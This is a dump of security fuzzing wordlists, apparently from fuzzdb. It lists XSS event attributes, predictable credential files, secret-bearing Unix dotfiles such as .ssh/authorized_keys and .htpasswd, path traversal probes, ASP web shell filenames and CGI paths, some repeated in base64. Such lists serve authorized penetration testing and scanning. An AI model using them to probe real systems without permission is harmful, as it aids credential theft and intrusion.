16 | onMouseOver
17 | onMouseUp
18 | onMove
19 | onReset
20 | onResize
21 | onSelect
22 | onSubmit
23 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/default-javascript-event-attributes.txt.base64:
--------------------------------------------------------------------------------
1 | b25BYm9ydA0Kb25CbHVyDQpvbkNoYW5nZQ0Kb25DbGljaw0Kb25EYmxDbGljaw0Kb25EcmFnRHJvcA0Kb25FcnJvcg0Kb25Gb2N1cw0Kb25LZXlEb3duDQpvbktleVByZXNzDQpvbktleVVwDQpvbkxvYWQNCm9uTW91c2VEb3duDQpvbk1vdXNlTW92ZQ0Kb25Nb3VzZU91dA0Kb25Nb3VzZU92ZXINCm9uTW91c2VVcA0Kb25Nb3ZlDQpvblJlc2V0DQpvblJlc2l6ZQ0Kb25TZWxlY3QNCm9uU3VibWl0DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/test.xxe:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/Randomfiles.txt:
--------------------------------------------------------------------------------
1 | /accounts.txt
2 | /culeadora.txt
3 | /data.txt
4 | /database.txt
5 | /grabbed.html
6 | /info.txt
7 | /l0gs.txt
8 | /log.txt
9 | /logins.txt
10 | /logs.txt
11 | /members.txt
12 | /pass.txt
13 | /passes.txt
14 | /password.html
15 | /password.txt
16 | /passwords.html
17 | /passwords.txt
18 | /pazz.txt
19 | /pazzezs.txt
20 | /pw.txt
21 | /pws.txt
22 | /technico.txt
23 | /usernames.txt
24 | /users.txt
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/Randomfiles.txt.base64:
--------------------------------------------------------------------------------
1 | L2FjY291bnRzLnR4dA0KL2N1bGVhZG9yYS50eHQNCi9kYXRhLnR4dA0KL2RhdGFiYXNlLnR4dA0KL2dyYWJiZWQuaHRtbA0KL2luZm8udHh0DQovbDBncy50eHQNCi9sb2cudHh0DQovbG9naW5zLnR4dA0KL2xvZ3MudHh0DQovbWVtYmVycy50eHQNCi9wYXNzLnR4dA0KL3Bhc3Nlcy50eHQNCi9wYXNzd29yZC5odG1sDQovcGFzc3dvcmQudHh0DQovcGFzc3dvcmRzLmh0bWwNCi9wYXNzd29yZHMudHh0DQovcGF6ei50eHQNCi9wYXp6ZXpzLnR4dA0KL3B3LnR4dA0KL3B3cy50eHQNCi90ZWNobmljby50eHQNCi91c2VybmFtZXMudHh0DQovdXNlcnMudHh0DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/UnixDotfiles.txt:
--------------------------------------------------------------------------------
1 | /.DS_Store
2 | /.FBCIndex
3 | /.access
4 | /.addressbook
5 | /.bash_history
6 | /.bashrc
7 | /.cobalt
8 | /.cobalt/alert/service.cgi?service=
9 | /.cobalt/alert/service.cgi?service=
10 | /.cobalt/sysManage/../admin/.htaccess
11 | /.fhp
12 | /.forward
13 | /.history
14 | /.htaccess
15 | /.htaccess.old
16 | /.htaccess.save
17 | /.htaccess~
18 | /.htpasswd
19 | /.lynx_cookies
20 | /.mysql_history
21 | /.nsconfig
22 | /.nsf/../winnt/win.ini
23 | /.passwd
24 | /.perf
25 | /.pinerc
26 | /.plan
27 | /.proclog
28 | /.procmailrc
29 | /.profile
30 | /.psql_history
31 | /.rhosts
32 | /.sh_history
33 | /.ssh
34 | /.ssh/authorized_keys
35 | /.ssh/known_hosts
36 | /.www_acl
37 | /.wwwacl
38 | /.access
39 | /.cobalt
40 | /.cobalt/alert/service.cgi?service=
41 | /.cobalt/alert/service.cgi?service=
42 | /.fhp
43 | /.htaccess
44 | /.htaccess.old
45 | /.htaccess.save
46 | /.htaccess~
47 | /.htpasswd
48 | /.nsconfig
49 | /.passwd
50 | /.www_acl
51 | /.wwwacl
52 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt:
--------------------------------------------------------------------------------
1 | 3fexe.asp
2 | ASpy.asp
3 | EFSO.asp
4 | RemExp.asp
5 | aspxSH.asp
6 | aspxshell.aspx
7 | aspydrv.asp
8 | cmd.asp
9 | cmd.aspx
10 | cmdexec.aspx
11 | elmaliseker.asp
12 | filesystembrowser.aspx
13 | fileupload.aspx
14 | ntdaddy.asp
15 | spexec.aspx
16 | sql.aspx
17 | tool.asp
18 | tool.aspx
19 | toolaspshell.asp
20 | up.asp
21 | up.aspx
22 | zehir.asp
23 | zehir.aspx
24 | zehir4.asp
25 | zehir4.aspx
26 | cmd-asp-5.1.asp
27 | cmdasp.asp
28 | cmdasp.aspx
29 | list.asp
30 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt.base64:
--------------------------------------------------------------------------------
1 | M2ZleGUuYXNwDQpBU3B5LmFzcA0KRUZTTy5hc3ANClJlbUV4cC5hc3ANCmFzcHhTSC5hc3ANCmFzcHhzaGVsbC5hc3B4DQphc3B5ZHJ2LmFzcA0KY21kLmFzcA0KY21kLmFzcHgNCmNtZGV4ZWMuYXNweA0KZWxtYWxpc2VrZXIuYXNwDQpmaWxlc3lzdGVtYnJvd3Nlci5hc3B4DQpmaWxldXBsb2FkLmFzcHgNCm50ZGFkZHkuYXNwDQpzcGV4ZWMuYXNweA0Kc3FsLmFzcHgNCnRvb2wuYXNwDQp0b29sLmFzcHgNCnRvb2xhc3BzaGVsbC5hc3ANCnVwLmFzcA0KdXAuYXNweA0KemVoaXIuYXNwDQp6ZWhpci5hc3B4DQp6ZWhpcjQuYXNwDQp6ZWhpcjQuYXNweA0KY21kLWFzcC01LjEuYXNwDQpjbWRhc3AuYXNwDQpjbWRhc3AuYXNweA0KbGlzdC5hc3ANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt:
--------------------------------------------------------------------------------
1 | post-query
2 | Config1.htm
3 | My_eGallery/public/displayCategory.php
4 | servlet/custMsg?guestName=